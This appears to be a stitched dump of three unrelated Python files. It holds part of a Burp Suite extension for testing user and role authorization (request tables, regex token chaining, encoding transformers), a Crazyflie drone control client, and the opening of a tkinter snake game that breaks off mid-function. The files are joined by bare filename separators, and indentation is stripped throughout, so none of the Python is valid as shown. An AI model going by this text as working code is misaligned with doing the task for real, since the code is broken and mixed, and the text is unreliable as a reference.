self._extender._tabs.addTab(tabname,self.createRequestTabs(selectedMessage._userRuns[userEntry._index]))
JTable.changeSelection(self, row, col, toggle, extend)
return
def createRequestTabs(self, requestResponse, original=False, index=-1):
class RequestResponseTabbedPane(JTabbedPane):
def __init__(self, requestResponse):
self._requestResponse=requestResponse
requestTabs = RequestResponseTabbedPane(requestResponse)
requestViewer = self._extender._callbacks.createMessageEditor(self._extender, original)
responseViewer = self._extender._callbacks.createMessageEditor(self._extender, False)
requestTabs.addTab("Request", requestViewer.getComponent())
requestTabs.addTab("Response", responseViewer.getComponent())
self._extender._callbacks.customizeUiComponent(requestTabs)
requestViewer.setMessage(requestResponse.getRequest(), True)
if requestResponse.getResponse():
responseViewer.setMessage(requestResponse.getResponse(), False)
if not original:
requestTabs.setSelectedIndex(1)
if original and index>=0:
self._viewerMap[index] = requestViewer
return requestTabs
def redrawTable(self):
# NOTE: this is probably inefficient, but it should catch all changes to the table
self.getModel().fireTableStructureChanged()
self.getModel().fireTableDataChanged()
db = self.getModel()._db
# Regex comboboxes
regexComboBox = JComboBox(db.arrayOfRegexes)
regexComboBox.setEditable(True)
regexComboBoxEditor = DefaultCellEditor(regexComboBox)
self.getColumnModel().getColumn(2).setCellEditor(regexComboBoxEditor)
# Resize
self.getColumnModel().getColumn(0).setMinWidth(30)
self.getColumnModel().getColumn(0).setMaxWidth(45)
self.getColumnModel().getColumn(1).setMinWidth(300)
self.getColumnModel().getColumn(2).setMinWidth(150)
def updateMessages(self):
# For now it sounds like this does not need to be locked, since it's only manual operations
for messageIndex in self._viewerMap:
requestViewer = self._viewerMap[messageIndex]
if requestViewer and requestViewer.isMessageModified():
messageEntry = self.getModel()._db.arrayOfMessages[messageIndex]
newMessage = requestViewer.getMessage()
# TODO save the response too? Downside is that the original may not match the response anymore
messageEntry._requestResponse = RequestResponseStored(self._extender,
request=newMessage,
httpService=messageEntry._requestResponse.getHttpService())
self._viewerMap = {}
###
### Chain Tables
###
class ChainTableModel(AbstractTableModel):
def __init__(self, extender):
self._extender = extender
self._db = extender._db
self.chainFromDefault = "All Users (Default)"
self.requestPrefix = "Request: "
self.svPrefix = "SV_"
self.destPrefix = "Request(s): "
def getRowCount(self):
return self._db.getActiveChainCount()
def getColumnCount(self):
# Disable if there aren't any chains
if not self._db.getActiveChainCount():
return 1
return self._db.STATIC_CHAIN_TABLE_COLUMN_COUNT
def getColumnName(self, columnIndex):
if self.getColumnCount() == 1:
return ""
if columnIndex == 0:
return "Chain Name"
elif columnIndex == 1:
return "Source"
elif columnIndex == 2:
return "Regex - Extract from HTTP Response"
elif columnIndex == 3:
return "Destination(s)"
elif columnIndex == 4:
return "Regex - Replace into HTTP Request"
elif columnIndex == 5:
return "Use Values From:"
elif columnIndex == 6:
return "Transformers"
return ""
def getValueAt(self, rowIndex, columnIndex):
if self.getColumnCount() == 1:
return ""
chainEntry = self._db.getChainByRow(rowIndex)
if chainEntry:
if columnIndex == 0:
return chainEntry._name
elif columnIndex == 1:
if chainEntry._fromID.isdigit() and int(chainEntry._fromID) in self._db.getActiveMessageIndexes():
return self.requestPrefix+chainEntry._fromID
elif chainEntry._fromID.startswith(self.svPrefix):
# If it's a string, check if it's an SV
svEntry = self._db.getSVByName(chainEntry._fromID[len(self.svPrefix):])
if svEntry:
return svEntry._name
else:
return ""
else:
return ""
elif columnIndex == 2:
return chainEntry._fromRegex
elif columnIndex == 3:
return "" if not chainEntry._toID else self.destPrefix+chainEntry._toID
elif columnIndex == 4:
return chainEntry._toRegex
elif columnIndex == 5:
if chainEntry._sourceUser in self._db.getActiveUserIndexes():
return self._db.arrayOfUsers[chainEntry._sourceUser]._name
elif chainEntry._sourceUser == -1:
return self.chainFromDefault
else:
return ""
elif columnIndex == 6:
ret = "x"
for transformer in chainEntry._transformers:
ret = transformer+"("+ret+")"
return "" if ret == "x" else ret
return ""
def addRow(self, row):
self.fireTableRowsInserted(row,row)
def setValueAt(self, val, row, col):
# NOTE: testing if .locked is ok here since it's a manual operation
if self._db.lock.locked():
return
chainEntry = self._db.getChainByRow(row)
if chainEntry:
if col == 0:
chainEntry._name = val
elif col == 1:
if val and self.requestPrefix in val and val[len(self.requestPrefix):].isdigit():
chainEntry._fromID = val[len(self.requestPrefix):]
else:
# If it's a string, check if it's an SV
svEntry = self._db.getSVByName(val)
if svEntry:
chainEntry._fromID = self.svPrefix+svEntry._name
# Clear fromRegex since it's unused
chainEntry._fromRegex = ""
self.fireTableCellUpdated(row,col+1)
else:
chainEntry._fromID = ""
elif col == 2:
chainEntry._fromRegex = val
elif col == 3:
chainEntry._toID = val
elif col == 4:
chainEntry._toRegex = val
elif col == 5:
user = self._db.getUserByName(val)
if user:
chainEntry._sourceUser = user._index
else:
chainEntry._sourceUser = -1
elif col == 6:
if val == "(clear)":
chainEntry.clearTransformers()
else:
chainEntry.addTransformer(val)
self.fireTableCellUpdated(row,col)
def isCellEditable(self, row, col):
if col >= 0:
# Disable Regex when SV
if col == 2 and self._db.getChainByRow(row).getSVName():
return False
else:
return True
return False
def getColumnClass(self, columnIndex):
return str
class ChainTable(JTable):
def __init__(self, model):
self.setModel(model)
return
def redrawTable(self):
# NOTE: this is probably inefficient, but it should catch all changes to the table
self.getModel().fireTableStructureChanged()
self.getModel().fireTableDataChanged()
if self.getModel().getColumnCount() > 1:
db = self.getModel()._db
# Chain Use Value From comboboxes
users = [self.getModel().chainFromDefault]+[userEntry._name for userEntry in db.getUsersInOrderByRow()]
usersComboBox = JComboBox(users)
usersComboBoxEditor = DefaultCellEditor(usersComboBox)
self.getColumnModel().getColumn(5).setCellEditor(usersComboBoxEditor)
# Transformers Combobox
transformers = ["(clear)"]+ChainEntry.TransformerList
transformerComboBox = JComboBox(transformers)
transformerComboBoxEditor = DefaultCellEditor(transformerComboBox)
self.getColumnModel().getColumn(6).setCellEditor(transformerComboBoxEditor)
# Source ID comboboxes
sources = [sv._name for sv in db.arrayOfSVs] + [self.getModel().requestPrefix+str(x) for x in db.getActiveMessageIndexes()]
sourcesComboBox = JComboBox(sources)
sourcesComboBoxEditor = DefaultCellEditor(sourcesComboBox)
self.getColumnModel().getColumn(1).setCellEditor(sourcesComboBoxEditor)
destPrefix = self.getModel().destPrefix
# Popup editor for DEST IDs
class DestinationCellEditor(AbstractCellEditor, TableCellEditor, ActionListener):
# https://stackoverflow.com/questions/14153544/jtable-how-to-update-cell-using-custom-editor-by-pop-up-input-dialog-box
# Class-level defaults; fresh components are assigned in getTableCellEditorComponent
scrollablePane = JScrollPane()
destList = JList()
button = JButton()
oldVal = ""
def actionPerformed(self,e):
JOptionPane.showMessageDialog(self.button,self.scrollablePane,"Select All Request IDs",JOptionPane.PLAIN_MESSAGE)
self.fireEditingStopped()
def getTableCellEditorComponent(self,table,value,isSelected,rowIndex,vColIndex):
self.oldVal = value if destPrefix not in value else value[len(destPrefix):]
dests = db.getActiveMessageIndexes()
if dests:
self.destList = JList(dests)
self.destList.setVisibleRowCount(10)
self.scrollablePane = JScrollPane(self.destList)
self.button = JButton()
self.button.setBorderPainted(False)
self.button.setOpaque(False)
self.button.setContentAreaFilled(False)
self.button.addActionListener(self)
return self.button
def getCellEditorValue(self):
newValues = self.destList.getSelectedValuesList()
if not newValues:
return self.oldVal
return self.listToRanges(newValues)
# Convert a list of ints into a range string
def listToRanges(self, intList):
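# e.g. listToRanges([1, 2, 3, 7, 8]) -> "1-3,7-8"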
ret = []
for val in sorted(intList):
if not ret or ret[-1][-1]+1 != val:
ret.append([val])
else:
ret[-1].append(val)
return ",".join([str(x[0]) if len(x)==1 else str(x[0])+"-"+str(x[-1]) for x in ret])
self.getColumnModel().getColumn(3).setCellEditor(DestinationCellEditor())
# Resize
self.getColumnModel().getColumn(0).setMinWidth(180)
self.getColumnModel().getColumn(0).setMaxWidth(300)
self.getColumnModel().getColumn(1).setMinWidth(115)
self.getColumnModel().getColumn(1).setMaxWidth(175)
self.getColumnModel().getColumn(2).setMinWidth(180)
self.getColumnModel().getColumn(3).setMinWidth(160)
self.getColumnModel().getColumn(3).setMaxWidth(320)
self.getColumnModel().getColumn(4).setMinWidth(180)
self.getColumnModel().getColumn(5).setMinWidth(150)
self.getColumnModel().getColumn(5).setMaxWidth(270)
self.getColumnModel().getColumn(6).setMinWidth(100)
# For color-coding checkboxes in the message table
# Also Grey when not enabled
class SuccessBooleanRenderer(JCheckBox,TableCellRenderer):
def __init__(self, defaultCellRender, db):
self.setOpaque(True)
self.setHorizontalAlignment(JLabel.CENTER)
self._defaultCellRender = defaultCellRender
self._db = db
def getTableCellRendererComponent(self, table, value, isSelected, hasFocus, row, column):
cell = self._defaultCellRender.getTableCellRendererComponent(table, value, isSelected, hasFocus, row, column)
if value:
cell.setSelected(True)
else:
cell.setSelected(False)
if isSelected:
cell.setForeground(table.getSelectionForeground())
cell.setBackground(table.getSelectionBackground())
else:
cell.setForeground(table.getForeground())
cell.setBackground(table.getBackground())
# Color based on results
if column >= self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT:
messageEntry = self._db.getMessageByRow(row)
if messageEntry:
if messageEntry.isEnabled():
roleEntry = self._db.getRoleByColumn(column, 'm')
if roleEntry:
roleIndex = roleEntry._index
if not roleIndex in messageEntry._roleResults:
if isSelected:
cell.setBackground(table.getSelectionBackground())
else:
cell.setBackground(table.getBackground())
else:
# This site was used for generating color blends when selected (option 6 of 12)
# http://meyerweb.com/eric/tools/color-blend/#FFCD81:00CCFF:10:hex
sawExpectedResults = messageEntry._roleResults[roleIndex]
checkboxChecked = messageEntry._roles[roleIndex]
# NOTE: currently no way to detect false positive in failure mode
# failureRegexMode = messageEntry.isFailureRegex()
if sawExpectedResults:
# Set Green if success
if isSelected:
cell.setBackground(Color(0xC8,0xE0,0x51))
else:
cell.setBackground(Color(0x87,0xf7,0x17))
elif checkboxChecked:
# Set Blue if its probably a false positive
if isSelected:
cell.setBackground(Color(0x8B, 0xCD, 0xBA))
else:
cell.setBackground(Color(0x00,0xCC,0xFF))
else:
# Set Red if fail
if isSelected:
cell.setBackground(Color(0xFF, 0x87, 0x51))
else:
cell.setBackground(Color(0xFF, 0x32, 0x17))
else:
if isSelected:
cell.setBackground(Color(0xD1,0xB5,0xA3))
else:
cell.setBackground(Color.GRAY)
return cell
# For color-coding successregex in the message table
# Also Grey when not enabled
class RegexRenderer(JLabel, TableCellRenderer):
def __init__(self, defaultCellRender, db):
self._defaultCellRender = defaultCellRender
self._db = db
def getTableCellRendererComponent(self, table, value, isSelected, hasFocus, row, column):
# Regex color
cell = self._defaultCellRender.getTableCellRendererComponent(table, value, isSelected, hasFocus, row, column)
messageEntry = self._db.getMessageByRow(row)
if column == self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT-1:
if messageEntry:
if messageEntry.isFailureRegex():
# Set Grey if failure mode
if isSelected:
cell.setBackground(Color(0xD1,0xB5,0xA3))
else:
cell.setBackground(Color(0x99,0x99,0xCC))
else:
if isSelected:
cell.setBackground(table.getSelectionBackground())
else:
cell.setBackground(table.getBackground())
else:
if isSelected:
cell.setBackground(table.getSelectionBackground())
else:
cell.setBackground(table.getBackground())
# Set grey if disabled
if messageEntry and not messageEntry.isEnabled():
if isSelected:
cell.setBackground(Color(0xD1,0xB5,0xA3))
else:
cell.setBackground(Color.GRAY)
return cell
# Default Renderer checking User Table for Enabled
class UserEnabledRenderer(TableCellRenderer):
def __init__(self, defaultCellRender, db):
self._defaultCellRender = defaultCellRender
self._db = db
def getTableCellRendererComponent(self, table, value, isSelected, hasFocus, row, column):
# Regex color
cell = self._defaultCellRender.getTableCellRendererComponent(table, value, isSelected, hasFocus, row, column)
userEntry = self._db.getUserByRow(row)
if userEntry and not userEntry.isEnabled():
if isSelected:
cell.setBackground(Color(0xD1,0xB5,0xA3))
else:
cell.setBackground(Color.GRAY)
elif isSelected:
cell.setBackground(table.getSelectionBackground())
else:
cell.setBackground(table.getBackground())
return cell
# TODO (0.9): combine these classes
# Default Renderer checking Chain Table for Enabled
class ChainEnabledRenderer(TableCellRenderer):
def __init__(self, defaultCellRender, db):
self._defaultCellRender = defaultCellRender
self._db = db
def getTableCellRendererComponent(self, table, value, isSelected, hasFocus, row, column):
# Regex color
cell = self._defaultCellRender.getTableCellRendererComponent(table, value, isSelected, hasFocus, row, column)
chainEntry = self._db.getChainByRow(row)
if chainEntry and not chainEntry.isEnabled():
if isSelected:
cell.setBackground(Color(0xD1,0xB5,0xA3))
else:
cell.setBackground(Color.GRAY)
elif isSelected:
cell.setBackground(table.getSelectionBackground())
else:
cell.setBackground(table.getBackground())
return cell
##
## Classes for Messages, Roles, and Users
##
class MessageEntry:
def __init__(self, index, tableRow, requestResponse, name = "", roles = {}, regex = "", deleted = False, failureRegexMode = False, enabled = True):
self._index = index
self._tableRow = tableRow
self._requestResponse = requestResponse
self._name = name
self._roles = roles.copy()
self._failureRegexMode = failureRegexMode
self._regex = regex
self._deleted = deleted
self._userRuns = {}
self._roleResults = {}
self._enabled = enabled
return
# Roles map an index in the db Role array to a bool for whether the checkbox is enabled by default
def addRoleByIndex(self,roleIndex,enabled=False):
self._roles[roleIndex] = enabled
def setToggleForRoleByIndex(self, roleIndex, enabled):
self._roles[roleIndex] = enabled
# Add one Run Result of user x message
def addRunByUserIndex(self,userIndex,requestResponse):
self._userRuns[userIndex] = requestResponse
def setRoleResultByRoleIndex(self, roleIndex, roleResult):
self._roleResults[roleIndex] = roleResult
def setDeleted(self):
self._deleted = True
def isDeleted(self):
return self._deleted
def setTableRow(self, row):
self._tableRow = row
def getTableRow(self):
return self._tableRow
def isFailureRegex(self):
return self._failureRegexMode
def setFailureRegex(self, enabled=True):
self._failureRegexMode = enabled
def clearResults(self):
# Clear Previous Results:
self._roleResults = {}
self._userRuns = {}
def isEnabled(self):
return self._enabled
def toggleEnabled(self):
self._enabled = not self._enabled
class UserEntry:
def __init__(self, index, tableRow, name, roles = {}, deleted=False, cookies="", headers = [], enabled = True):
self._index = index
self._name = name
self._roles = roles.copy()
self._deleted = deleted
self._tableRow = tableRow
self._cookies = cookies
self._headers = headers[:]
self._chainResults = {}
self._enabled = enabled
return
# Roles map an index in the db role array to a bool for whether the checkbox is enabled by default
def addRoleByIndex(self, roleIndex, enabled=False):
self._roles[roleIndex] = enabled
def addChainResultByMessageIndex(self, toID, toValue, chainIndex):
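# _chainResults maps a destination message ID to a list of (toValue,
# chainIndex) tuples; getChainResultByMessageIndex below hands them back
# when that message is replayed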
if not toID in self._chainResults:
self._chainResults[toID] = [(toValue, chainIndex)]
else:
self._chainResults[toID].append((toValue, chainIndex))
def getChainResultByMessageIndex(self, toID):
if toID in self._chainResults:
return self._chainResults[toID]
return []
def clearChainResults(self):
self._chainResults = {}
def setDeleted(self):
self._deleted = True
def isDeleted(self):
return self._deleted
def setTableRow(self, row):
self._tableRow = row
def getTableRow(self):
return self._tableRow
def isEnabled(self):
return self._enabled
def toggleEnabled(self):
self._enabled = not self._enabled
class RoleEntry:
def __init__(self,index,columnIndex,name,deleted=False,singleUser=False):
self._index = index
self._name = name
self._deleted = deleted
self._column = columnIndex
self._singleUser = singleUser
return
def setDeleted(self):
self._deleted = True
def isDeleted(self):
return self._deleted
# NOTE: in v0.6 this value was changed to index into the dynamic columns only
def setColumn(self, column):
self._column = column
def getColumn(self):
return self._column
def isSingleUser(self):
return self._singleUser
class ChainEntry:
TransformerList = ["base64","url","hex","sha1","sha256","sha512","md5"]
def __init__(self, index, tableRow, name="", fromID="", fromRegex="", toID="", toRegex="", deleted=False, sourceUser=-1, enabled=True, transformers=[]):
self._index = index
self._fromID = fromID
self._fromRegex = fromRegex
self._toID = toID
self._toRegex = toRegex
self._deleted = deleted
self._tableRow = tableRow
self._name = name
self._sourceUser = sourceUser
self._fromStart = ""
self._fromEnd = ""
self._toStart = ""
self._toEnd = ""
self._enabled = enabled
self._transformers = transformers[:]
return
def setDeleted(self):
self._deleted = True
def isDeleted(self):
return self._deleted
def setTableRow(self, row):
self._tableRow = row
def getTableRow(self):
return self._tableRow
def getFromStart(self):
return self._fromStart
def getFromEnd(self):
return self._fromEnd
def getToStart(self):
return self._toStart
def getToEnd(self):
return self._toEnd
def setFromStart(self, fromStart):
self._fromStart = fromStart
if self._fromEnd:
self._fromRegex = self.getRexegFromStartAndEnd(self._fromStart,self._fromEnd)
def setFromEnd(self, fromEnd):
self._fromEnd = fromEnd
if self._fromStart:
self._fromRegex = self.getRexegFromStartAndEnd(self._fromStart,self._fromEnd)
def setToStart(self, toStart):
self._toStart = toStart
if self._toEnd:
self._toRegex = self.getRexegFromStartAndEnd(self._toStart,self._toEnd)
def setToEnd(self, toEnd):
self._toEnd = toEnd
if self._toStart:
self._toRegex = self.getRexegFromStartAndEnd(self._toStart,self._toEnd)
def getRexegFromStartAndEnd(self,start,end):
# TODO add this to the UI, perhaps with a right click option to change the table rows?
return re.escape(start)+"(.*?)"+re.escape(end)
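# Illustrative sketch (not part of the original extension; names and values
# here are hypothetical): how the generated start/end regex extracts a token.
# >>> chain = ChainEntry(0, 0)
# >>> chain.setFromStart('name="csrf" value="')
# >>> chain.setFromEnd('"')
# >>> re.search(chain._fromRegex, 'name="csrf" value="abc123"').group(1)
# 'abc123'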
def getToIDRange(self):
result = []
for part in self._toID.split(','):
if '-' in part:
a,b = part.split('-')
if a.isdigit() and b.isdigit():
a,b = int(a),int(b)
result.extend(range(a,b+1))
else:
if part.isdigit():
a = int(part)
result.append(a)
return result
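# Example (sketch): getToIDRange() expands the comma/dash syntax used for
# message IDs in the "to" field.
# >>> c = ChainEntry(0, 0, toID="1,3-5,9")
# >>> c.getToIDRange()
# [1, 3, 4, 5, 9]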
def getSVName(self):
# TODO access svPrefix from above
if self._fromID.startswith("SV_"):
return self._fromID[3:]
return None
def isEnabled(self):
return self._enabled
def toggleEnabled(self):
self._enabled = not self._enabled
def addTransformer(self, value):
self._transformers.append(value)
def clearTransformers(self):
self._transformers=[]
def transform(self, value, callbacks):
ret = value
if not ret:
return ""
try:
for transformer in self._transformers:
# apply each transformer in TransformerList order: base64, url, hex, sha1, sha256, sha512, md5
if transformer == self.TransformerList[0]:
ret = base64.b64encode(ret.encode('utf-8'))
elif transformer == self.TransformerList[1]:
ret = urllib.quote_plus(ret)
elif transformer == self.TransformerList[2]:
ret = base64.b16encode(ret)
elif transformer == self.TransformerList[3]:
ret = hashlib.sha1(ret).hexdigest()
elif transformer == self.TransformerList[4]:
ret = hashlib.sha256(ret).hexdigest()
elif transformer == self.TransformerList[5]:
ret = hashlib.sha512(ret).hexdigest()
elif transformer == self.TransformerList[6]:
ret = hashlib.md5(ret).hexdigest()
except:
traceback.print_exc(file=callbacks.getStderr())
return value
return ret
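# Example (sketch, hypothetical value): transformers are applied in order.
# With value "token" and transformers ["base64", "sha1"], the value is first
# base64-encoded to 'dG9rZW4=' and the SHA-1 hex digest of that string is
# returned; on any error the original value is returned unchanged.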
class SVEntry:
def __init__(self, name, userValues = {}):
self._name=name
self._userValues = userValues.copy()
def setValueForUserIndex(self, userIndex, val):
self._userValues[userIndex] = val
def getValueForUserIndex(self, userIndex):
if userIndex in self._userValues:
return self._userValues[userIndex]
return ""
##
## RequestResponse Implementation
##
class RequestResponseStored(IHttpRequestResponse):
def __init__(self, extender, host=None, port=None, protocol=None, request=None, response=None, comment=None, highlight=None, httpService=None, requestResponse=None):
self._extender=extender
self._host=host
self._port=port
self._protocol=protocol
self._request=request
self._response=response
self._comment=comment
self._highlight=highlight
if httpService:
self.setHttpService(httpService)
if requestResponse:
self.cast(requestResponse)
return
def getComment(self):
return self._comment
def getHighlight(self):
return self._highlight
def getHttpService(self):
service = self._extender._helpers.buildHttpService(self._host, self._port, self._protocol)
if service:
return service
return None
def getRequest(self):
return self._request
def getResponse(self):
return self._response
def setComment(self, comment):
self._comment = comment
return
def setHighlight(self, color):
self._highlight = color
return
def setHttpService(self, httpService):
self._host=httpService.getHost()
self._port=httpService.getPort()
self._protocol=httpService.getProtocol()
return
def setRequest(self, message):
self._request = message
return
def setResponse(self, message):
self._response = message
return
def cast(self, requestResponse):
self.setComment(requestResponse.getComment())
self.setHighlight(requestResponse.getHighlight())
self.setHttpService(requestResponse.getHttpService())
self.setRequest(requestResponse.getRequest())
self.setResponse(requestResponse.getResponse())
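# Usage sketch (hypothetical variable names): snapshot a live Burp
# IHttpRequestResponse so it can survive serialization:
# stored = RequestResponseStored(extender, requestResponse=messageInfo)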
##
## Drag and Drop
##
class RowTransferHandler(TransferHandler):
def __init__(self, table):
self._table = table
def createTransferable(self, c):
assert(c == self._table)
return StringSelection(str(c.getSelectedRow()))
def getSourceActions(self, c):
return TransferHandler.COPY_OR_MOVE
def exportDone(self, c, t, act):
if act == TransferHandler.MOVE or act == TransferHandler.NONE:
self._table.redrawTable()
def canImport(self, info):
b = info.getComponent() == self._table and info.isDrop() and info.isDataFlavorSupported(DataFlavor.stringFlavor)
return b
def importData(self, info):
target = info.getComponent()
dl = info.getDropLocation()
index = dl.getRow()
tablemax = self._table.getModel().getRowCount()
if index < 0 or index > tablemax:
index = tablemax
rowFrom = info.getTransferable().getTransferData(DataFlavor.stringFlavor)
if isinstance(self._table, MessageTable):
self._table.getModel()._db.moveMessageToRow(int(rowFrom), int(index))
elif isinstance(self._table, UserTable):
self._table.getModel()._db.moveUserToRow(int(rowFrom), int(index))
return True
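# Wiring sketch (standard Swing drag-and-drop API; `table` is a hypothetical
# MessageTable instance):
# table.setDragEnabled(True)
# table.setDropMode(DropMode.INSERT_ROWS)
# table.setTransferHandler(RowTransferHandler(table))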
##
## LEGACY SERIALIZABLE CLASSES
##
# Serializable DB
# Used to store Database to Disk on Save and Load
class MatrixDBData():
def __init__(self, arrayOfMessages, arrayOfRoles, arrayOfUsers, deletedUserCount, deletedRoleCount, deletedMessageCount):
self.arrayOfMessages = arrayOfMessages
self.arrayOfRoles = arrayOfRoles
self.arrayOfUsers = arrayOfUsers
self.deletedUserCount = deletedUserCount
self.deletedRoleCount = deletedRoleCount
self.deletedMessageCount = deletedMessageCount
# Serializable MessageEntry
# Used since the Burp RequestResponse object can not be serialized
class MessageEntryData:
def __init__(self, index, tableRow, requestData, host, port, protocol, name, roles, successRegex, deleted):
self._index = index
self._tableRow = tableRow
self._requestData = requestData
self._host = host
self._port = port
self._protocol = protocol
self._url = "" # NOTE obsolete, kept for backwords compatability
self._name = name
self._roles = roles
# NOTE: to preserve backwards compatibility, successregex will have a specific prefix "|AMFAILURE|" to indicate FailureRegexMode
self._successRegex = successRegex
self._deleted = deleted
return
class RoleEntryData:
def __init__(self,index,mTableColumnIndex,uTableColumnIndex,name,deleted):
self._index = index
self._name = name
self._deleted = deleted
# NOTE: to preserve backwards compatibility, these will be the dynamic column +3
self._mTableColumn = mTableColumnIndex
self._uTableColumn = uTableColumnIndex
return
class UserEntryData:
def __init__(self, index, tableRow, name, roles, deleted, token, staticcsrf):
self._index = index
self._name = name
self._roles = roles
self._deleted = deleted
self._tableRow = tableRow
self._token = token
self._staticcsrf = staticcsrf
return
|
simpleclient.py | #!/usr/bin/env python2
############################ CLIENT OPTIONS ##########################################
#TXRX_FREQUENCY = 1000.0
STARTUP_NANOKONTROL = True
USE_DRAKE_CONTROLLER = True
SE_LISTEN_TO_VICON = True
SE_VICON_CHANNEL = 'cf2_pete1'
SE_PUBLISH_TO_LCM = True
SE_USE_RPYDOT = True
SE_USE_EKF = True
SE_USE_UKF = False
SE_DELAY_COMP = False
CTRL_INPUT_TYPE = 'omegasqu'
CTRL_LISTEN_TO_LCM = True
CTRL_LISTEN_TO_EXTRA_INPUT = True
CTRL_PUBLISH_TO_LCM = True
CTRL_USE_POSITION_CONTROL = True
######################################################################################
import struct
import array
import usb
import os
import time
from threading import Thread, Lock, Event
import cflib
from cflib.crazyflie import Crazyflie
from cflib.crtp.crtpstack import CRTPPacket, CRTPPort
import nanokontrol
from estimation import StateEstimator
from controller import Controller
import lcm
from crazyflie_t import crazyflie_imu_t
# Crazyradio options
ACK_ENABLE = 0x10
SET_RADIO_ARC = 0x06
SET_DATA_RATE = 0x03
class SimpleClient:
def __init__(self, link_uri):
self._cf = Crazyflie()
self._cf.connected.add_callback(self._connected)
self._cf.disconnected.add_callback(self._disconnected)
self._cf.connection_failed.add_callback(self._connection_failed)
self._cf.connection_lost.add_callback(self._connection_lost)
self._cf.open_link(link_uri)
print "Connecting to %s" % link_uri
def _connected(self, link_uri):
# stopping the regular CRTP link
self._cf.link.device_flag.clear()
self._dev_handle = self._cf.link.cradio.handle
self._send_vendor_setup(SET_RADIO_ARC, 0, 0, ())
self._use_drake_controller = USE_DRAKE_CONTROLLER
self._use_pos_control = CTRL_USE_POSITION_CONTROL
# state estimator
self._state_estimator = StateEstimator(listen_to_vicon=SE_LISTEN_TO_VICON,
vicon_channel=SE_VICON_CHANNEL,
publish_to_lcm=SE_PUBLISH_TO_LCM,
use_rpydot=SE_USE_RPYDOT,
use_ekf=SE_USE_EKF,
use_ukf=SE_USE_UKF,
delay_comp=SE_DELAY_COMP)
# controller
self._control_input_updated_flag = Event()
self._controller = Controller(control_input_type=CTRL_INPUT_TYPE,
listen_to_lcm=CTRL_LISTEN_TO_LCM,
control_input_updated_flag=self._control_input_updated_flag,
listen_to_extra_input=CTRL_LISTEN_TO_EXTRA_INPUT,
publish_to_lcm=CTRL_PUBLISH_TO_LCM,
pos_control=CTRL_USE_POSITION_CONTROL)
# Transmitter thread (handles all comm with the crazyflie)
Thread(target=self._transmitter_thread).start()
if STARTUP_NANOKONTROL:
Thread(target=nanokontrol.main).start()
def _connection_failed(self, link_uri, msg):
print "Connection to %s failed: %s" % (link_uri, msg)
def _connection_lost(self, link_uri, msg):
print "Connection to %s lost: %s" % (link_uri, msg)
def _disconnected(self, link_uri):
print "Disconnected from %s" % link_uri
def _transmitter_thread(self):
sensor_request_pk = CRTPPacket()
sensor_request_pk.port = CRTPPort.SENSORS
control_input_pk = CRTPPacket()
control_input_pk.port = CRTPPort.OFFBOARDCTRL
vicon_yaw = 0.0
if SE_LISTEN_TO_VICON:
use_vicon_yaw = 1
else:
use_vicon_yaw = 0
imu_lc = lcm.LCM()
while True:
#t0 = time.time()
sensor_request_pk.data = struct.pack('<fi',vicon_yaw,use_vicon_yaw)
sensor_request_dataout = self._pk_to_dataout(sensor_request_pk)
datain = self._write_read_usb(sensor_request_dataout)
sensor_packet = self._datain_to_pk(datain)
if not sensor_packet:
continue
try:
imu_reading = struct.unpack('<7f',sensor_packet.data)
except:
continue
self._state_estimator.add_imu_reading(imu_reading)
# msg = crazyflie_imu_t()
# msg.omegax = imu_reading[0]
# msg.omegay = imu_reading[1]
# msg.omegaz = imu_reading[2]
# msg.alphax = imu_reading[3]
# msg.alphay = imu_reading[4]
# msg.alphaz = imu_reading[5]
# imu_lc.publish('crazyflie_imu', msg.encode())
self._control_input_updated_flag.clear()
xhat = self._state_estimator.get_xhat()
vicon_yaw = xhat[5]
if self._use_drake_controller:
# wait for Drake to give us the control input
self._control_input_updated_flag.wait(0.005)
control_input = self._controller.get_control_input(xhat=xhat)
if self._use_pos_control:
control_input_pk.data = struct.pack('<7f',*control_input)
else:
control_input_pk.data = struct.pack('<5fi',*control_input)
control_input_dataout = self._pk_to_dataout(control_input_pk)
self._write_usb(control_input_dataout)
if not(self._use_pos_control):
# TODO: position control could still update the state
# estimator about the last input sent
self._state_estimator.add_input(control_input[0:4])
#tf = time.time()
#time.sleep(max(0.0,(1.0/TXRX_FREQUENCY)-float(tf-t0)))
def _pk_to_dataout(self,pk):
dataOut = array.array('B')
dataOut.append(pk.header)
for X in pk.data:
if type(X) == int:
dataOut.append(X)
else:
dataOut.append(ord(X))
return dataOut
def _datain_to_pk(self,dataIn):
if dataIn != None:
if dataIn[0] != 0:
data = dataIn[1:]
if (len(data) > 0):
packet = CRTPPacket(data[0], list(data[1:]))
return packet
def _write_usb(self, dataout):
try:
self._dev_handle.write(endpoint=1, data=dataout, timeout=0)
except usb.USBError:
pass
def _write_read_usb(self, dataout):
datain = None
try:
self._dev_handle.write(endpoint=1, data=dataout, timeout=0)
datain = self._dev_handle.read(0x81, 64, timeout=5)
except usb.USBError:
pass
return datain
def _send_vendor_setup(self, request, value, index, data):
self._dev_handle.ctrl_transfer(usb.TYPE_VENDOR, request, wValue=value,
wIndex=index, timeout=1000, data_or_wLength=data)
if __name__ == '__main__':
if SE_USE_UKF:
raise Exception('The UKF is not functional yet. Please use the EKF.')
cflib.crtp.init_drivers(enable_debug_driver=False)
print "Scanning interfaces for Crazyflies..."
available = cflib.crtp.scan_interfaces()
print "Crazyflies found:"
for i in available:
print i[0]
if len(available) > 0:
client = SimpleClient('radio://0/80/250K')
#client = SimpleClient(available[0][0])
else:
print "No Crazyflies found, cannot run the client" |
Gluttonous snake.py | import time
import random
import threading
import os
from tkinter import *
import tkinter.messagebox as messagebox
# Core module (game logic)
class Core():
row = 40 # number of grid rows on the board
column = 40 # number of grid columns on the board
score = 0 # score
interval = 0.08 # speed (seconds per step)
# opposite directions, used to ignore reversing moves
opposite_Direction = {
'Up': 'Down',
'Down': 'Up',
'Right': 'Left',
'Left': 'Right'
}
# snake state
snake = {
'direction': 'Right', # current direction
'food': (None, None), # food position
'snake': [(30, 20), (30, 21), (30, 22), (30, 23)], # body cells as a queue (tail -> head)
'tail': (30, 19) # tail cell that needs to be erased
}
# initialization
def __init__(self):
self.food() # generate the first piece of food
# generate food
def food(self):
food = self.snake['snake'][0]
while food in self.snake['snake']: # avoid spawning food on the snake body
food = (
random.randint(1, self.row - 2),
random.randint(1, self.column - 2)
)
self.snake['food'] = food
# compute the next cell coordinate for a given movement direction
def nextDot(self, direction):
dot = None
length = len(self.snake['snake'])
if direction == 'Up': # up
dot = (
self.snake['snake'][length - 1][0] - 1,
